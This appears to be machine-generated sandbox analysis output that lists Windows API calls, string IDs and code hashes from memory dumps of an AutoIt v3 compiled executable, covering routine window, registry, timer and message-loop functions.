                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ColorProc$LongWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3744519093-0
                                                                                                                                                                                                              • Opcode ID: 818c99f58ef269f39263b1e985fd58f0827da31719db9f1c7101efe7ca00697e
                                                                                                                                                                                                              • Instruction ID: f2059e952b1631e432c1e8528dfabbc2c6f39ccbf00fab32f0f388b325ad106f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 818c99f58ef269f39263b1e985fd58f0827da31719db9f1c7101efe7ca00697e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAA15774116604BBE628EB6D9C89E7FA6DEDB41301F140AABF442D63D1EB209E01D279
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BE4B85
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00BE27AF,?,00000001), ref: 00BE4B97
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2574300362-3689287502
                                                                                                                                                                                                              • Opcode ID: e9446c9c47ab258a11d8be0def037c14ec7e402613984cfa5f5d95498cf9b9eb
                                                                                                                                                                                                              • Instruction ID: 86f7d9a22eab44ffaf9db666e02b341cb5431521fb67502f0187e15cd00bace2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9446c9c47ab258a11d8be0def037c14ec7e402613984cfa5f5d95498cf9b9eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82D01771910B128FD7309F72DC59B0B76E4AF05351F258C7AD496E2550E7B0E880DA14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BDBF57
                                                                                                                                                                                                                • Part of subcall function 00BD52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD52E6
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00C136B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePeekSleepTimetime
                                                                                                                                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                                                                                                                              • API String ID: 1792118007-922114024
                                                                                                                                                                                                              • Opcode ID: 1f46ccee5bc80ca89870b4d0ead6c09eff4df0fbddab89ee33d3548ccbc38115
                                                                                                                                                                                                              • Instruction ID: d19f0b9ca28c5a5c66797557b8be277bdae8d03805f3824745aa36618e54bb84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f46ccee5bc80ca89870b4d0ead6c09eff4df0fbddab89ee33d3548ccbc38115
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65C29D70608381DBD728DF24C894BAAF7E5BF85304F14495EE49A973A1DB70E984DB82
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SystemParametersInfoW.USER32 ref: 00BD2C8C
                                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00BD2C94
                                                                                                                                                                                                              • SystemParametersInfoW.USER32 ref: 00BD2CBF
                                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00BD2CC7
                                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00BD2CEC
                                                                                                                                                                                                              • SetRect.USER32 ref: 00BD2D09
                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BD2D19
                                                                                                                                                                                                              • CreateWindowExW.USER32 ref: 00BD2D4C
                                                                                                                                                                                                              • SetWindowLongW.USER32 ref: 00BD2D60
                                                                                                                                                                                                              • GetClientRect.USER32 ref: 00BD2D7E
                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00BD2D9A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BD2DA5
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetCursorPos.USER32(?), ref: 00BD2727
                                                                                                                                                                                                                • Part of subcall function 00BD2714: ScreenToClient.USER32(00C977B0,?), ref: 00BD2744
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetAsyncKeyState.USER32 ref: 00BD2769
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetAsyncKeyState.USER32 ref: 00BD2777
                                                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00BD13C7), ref: 00BD2DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                                                                                                                              • API String ID: 1458621304-248962490
                                                                                                                                                                                                              • Opcode ID: 7f60d68a704edac330e9315ada84909bd59dcc350a1b3a17a41c02c0bcd49d5d
                                                                                                                                                                                                              • Instruction ID: b333a96999831f56164d5585fb1aebc3626516c967600e27abb296e546bc8f94
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f60d68a704edac330e9315ada84909bd59dcc350a1b3a17a41c02c0bcd49d5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96B16F7161124A9FDB14DFA8CD89BAEBBF4FB18310F10426AFA15A72D0DB70A950CF54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00BE3094), ref: 00BF00ED
                                                                                                                                                                                                                • Part of subcall function 00BF08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BE309F), ref: 00BF08E3
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BE30E2
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C201BA
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C201FB
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00C20239
                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00C20292
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                                                                              • String ID: 0S$Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                              • API String ID: 2673923337-2618649551
                                                                                                                                                                                                              • Opcode ID: f6aa61b37bdc8b872154d7a7b4e63620d2d782ff1e8e6a5b036997581f65c963
                                                                                                                                                                                                              • Instruction ID: 53bc24b06f43577e2f06d37a85a12a502cba233e30d219b5fc22bd68a80bf1c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6aa61b37bdc8b872154d7a7b4e63620d2d782ff1e8e6a5b036997581f65c963
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B716D71405B419EC714EF6AE889A6FBBE8FF46340B50096FF555C32A1EF309948CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BE2A3E,?,00008000), ref: 00BF0BA7
                                                                                                                                                                                                                • Part of subcall function 00BF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BE2A58,?,00008000), ref: 00BF02A4
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BE2ADF
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BE2C2C
                                                                                                                                                                                                                • Part of subcall function 00BE3EBE: _wcscpy.LIBCMT ref: 00BE3EF6
                                                                                                                                                                                                                • Part of subcall function 00BF386D: _iswctype.LIBCMT ref: 00BF3875
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                              • API String ID: 537147316-3738523708
                                                                                                                                                                                                              • Opcode ID: eec58a5a1cc72c267bb6994c510956d2c41bbcafcf9a598063109fc07dbdeabb
                                                                                                                                                                                                              • Instruction ID: 58413aea6d163fd3f796ac77460d16607feb689c48c8670dcded47b2995efccf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eec58a5a1cc72c267bb6994c510956d2c41bbcafcf9a598063109fc07dbdeabb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D02C4701083819FC724EF25C891AAFBBE5FF85314F10496DF49A932A2DB30DA49DB42
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSysColorBrush.USER32 ref: 00BE5156
                                                                                                                                                                                                              • LoadCursorW.USER32 ref: 00BE5165
                                                                                                                                                                                                              • LoadIconW.USER32 ref: 00BE517C
                                                                                                                                                                                                              • LoadIconW.USER32 ref: 00BE518E
                                                                                                                                                                                                              • LoadIconW.USER32 ref: 00BE51A0
                                                                                                                                                                                                              • LoadImageW.USER32 ref: 00BE51C6
                                                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 00BE521C
                                                                                                                                                                                                                • Part of subcall function 00BD3411: GetSysColorBrush.USER32 ref: 00BD3444
                                                                                                                                                                                                                • Part of subcall function 00BD3411: RegisterClassExW.USER32(00000030), ref: 00BD346E
                                                                                                                                                                                                                • Part of subcall function 00BD3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BD347F
                                                                                                                                                                                                                • Part of subcall function 00BD3411: InitCommonControlsEx.COMCTL32(?), ref: 00BD349C
                                                                                                                                                                                                                • Part of subcall function 00BD3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BD34AC
                                                                                                                                                                                                                • Part of subcall function 00BD3411: LoadIconW.USER32 ref: 00BD34C2
                                                                                                                                                                                                                • Part of subcall function 00BD3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BD34D1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                                                              • Opcode ID: 9a857156411d7c615e0ade41ba3b6b38ea415f18f7a38d04b17e55f04f0fe43b
                                                                                                                                                                                                              • Instruction ID: eec698791c45bbec3baa731558c3a3b61bf858eb8ba5e10314d6bfd110099e22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a857156411d7c615e0ade41ba3b6b38ea415f18f7a38d04b17e55f04f0fe43b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39218D70D26708EFEB209FA5ED09B9E7BF4FB08710F10029AF504A62A0D7B56940CF84
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00BE4E22
                                                                                                                                                                                                              • KillTimer.USER32 ref: 00BE4E4C
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BE4E6F
                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BE4E7A
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00BE4E8E
                                                                                                                                                                                                              • PostQuitMessage.USER32 ref: 00BE4EAF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                              • String ID: TaskbarCreated
                                                                                                                                                                                                              • API String ID: 129472671-2362178303
                                                                                                                                                                                                              • Opcode ID: 2d427f14ea514c3e620f77880a0c5ee4c45df4e34fb2a22aa69078135d76ff96
                                                                                                                                                                                                              • Instruction ID: f263f9ac3fd0b8c7d874c9d44da677589222eb23fe663e76a21e784f02b6ad00
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d427f14ea514c3e620f77880a0c5ee4c45df4e34fb2a22aa69078135d76ff96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34416D71228286EBDF295F25DC4DB7E36D5FB41300F1006E6F502A26E2CBB0AC50D765
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00BD2E9F
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00BD2EE7
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000006), ref: 00C0C55B
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00C0C5C7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1268545403-0
                                                                                                                                                                                                              • Opcode ID: f4b52be82b24180ced740421b9242fe5426770e96e02be9cc65daeef94728602
                                                                                                                                                                                                              • Instruction ID: 5d7cc527d18b5c94a9526fe7f629769bc31873790d6247a7399fb08ba4c1a1f8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4b52be82b24180ced740421b9242fe5426770e96e02be9cc65daeef94728602
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD41D8386086C09BC7358B29CCCC76BFBD2EBA1300F28499FE447567A1E771A940E710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                                                              • Opcode ID: 2d72f0bc00e5d678e0550683b4bf8267c686e377846e8026c0e31dd120c9d6c4
                                                                                                                                                                                                              • Instruction ID: 6568a7c1df83536ec08b2633c7fb0cdfe995b6961776a68668cfb3a9acaec74a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d72f0bc00e5d678e0550683b4bf8267c686e377846e8026c0e31dd120c9d6c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62F0DA71566694BEEA3117276C4CF2B2E7DD7C6F50F11022AB900A21B1C6A51851DAB4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1559183368-0
                                                                                                                                                                                                              • Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                                                                                                                                                                              • Instruction ID: 835e54e44d25c198767e52af7bd7020f1013365c9bbdeb6382277bcb72e362f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED518030A00B0DEBDB34AE69988467E77E5EF40324F2486A9EB35D72D0DB709D589B40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD52E6
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD534A
                                                                                                                                                                                                              • TranslateMessage.USER32 ref: 00BD5356
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00BD5360
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1795658109-0
                                                                                                                                                                                                              • Opcode ID: 4727f93b63578b8a398b217da91dab41fddc0aca5c9049ecee74b04e59b883b8
                                                                                                                                                                                                              • Instruction ID: 24fb5fa9db14093e47502ee7823f275cac1d8bbf5b02b5f33d18a08aacc19a87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4727f93b63578b8a398b217da91dab41fddc0aca5c9049ecee74b04e59b883b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B831EA30518B069BEB308BA8DC88FFEB7E89B01354F2441DBE423972D1E7B59585D715
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF07EC
                                                                                                                                                                                                                • Part of subcall function 00BF07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF07F4
                                                                                                                                                                                                                • Part of subcall function 00BF07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF07FF
                                                                                                                                                                                                                • Part of subcall function 00BF07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF080A
                                                                                                                                                                                                                • Part of subcall function 00BF07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF0812
                                                                                                                                                                                                                • Part of subcall function 00BF07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF081A
                                                                                                                                                                                                                • Part of subcall function 00BEFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BDAC6B), ref: 00BEFFA7
                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BDAD08
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00BDAD85
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C12F56
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                              • String ID: xP
                                                                                                                                                                                                              • API String ID: 1986988660-2965289322
                                                                                                                                                                                                              • Opcode ID: 1fac67e04175d3660a7b2a901a670ee4538bb0f2bec60418db44e87fd891a3c6
                                                                                                                                                                                                              • Instruction ID: bb346924f8859416a09674fb43b99a0b9a548a13e5c47784f7bdea4b850656bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fac67e04175d3660a7b2a901a670ee4538bb0f2bec60418db44e87fd891a3c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9681AAB092B2808ECB95EF6AAD8C75D7FE9FB5830471087ABD419C7272E77044049F59
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BD1275,SwapMouseButtons,00000004,?), ref: 00BD12A8
